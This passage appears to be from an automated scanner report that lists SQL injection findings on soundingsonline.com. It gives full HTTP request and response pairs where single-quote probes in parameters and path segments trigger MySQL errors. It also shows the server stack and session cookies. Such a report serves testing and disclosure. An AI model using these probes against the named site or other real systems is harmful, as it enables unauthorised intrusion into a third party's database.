Last-Modified: Tue, 25 Jan 2011 02:52:54 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.159. http://www.soundingsonline.com/component/chronocontact/ [chronoformname parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /component/chronocontact/

Issue detail

The chronoformname parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the chronoformname parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /component/chronocontact/?chronoformname=PSPage' HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:52:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:52:39 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/component/chronocontact/?chronoformname=PSPage'' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /component/chronocontact/?chronoformname=PSPage'' HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:52:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:52:39 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.160. http://www.soundingsonline.com/component/chronocontact/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /component/chronocontact/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /component/chronocontact/?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:52:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:52:45 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /component/chronocontact/?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:52:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:52:46 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.161. http://www.soundingsonline.com/component/content/article/237622 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /component/content/article/237622

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /component/content'/article/237622 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:53:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:53:01 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /component/content''/article/237622 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:53:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:53:02 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.162. http://www.soundingsonline.com/component/content/article/237622 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /component/content/article/237622

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /component/content/article'/237622 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:53:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:53:05 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /component/content/article''/237622 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:53:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:53:06 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.163. http://www.soundingsonline.com/component/content/article/237622 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /component/content/article/237622

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /component/content/article/237622' HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:53:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:53:10 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/component/content/article/237622'' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /component/content/article/237622'' HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:53:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:53:11 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.164. http://www.soundingsonline.com/component/content/article/237622 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /component/content/article/237622

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /component/content/article/237622?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:52:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:52:51 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /component/content/article/237622?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:52:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:52:52 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.165. http://www.soundingsonline.com/contact-us [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /contact-us

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /contact-us?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:38:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:38:51 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /contact-us?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:38:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:38:52 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.166. http://www.soundingsonline.com/features [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /features

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /features?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:38:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:38:26 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /features?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:38:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:38:35 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.167. http://www.soundingsonline.com/features/in-depth [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /features/in-depth

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /features/in-depth?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
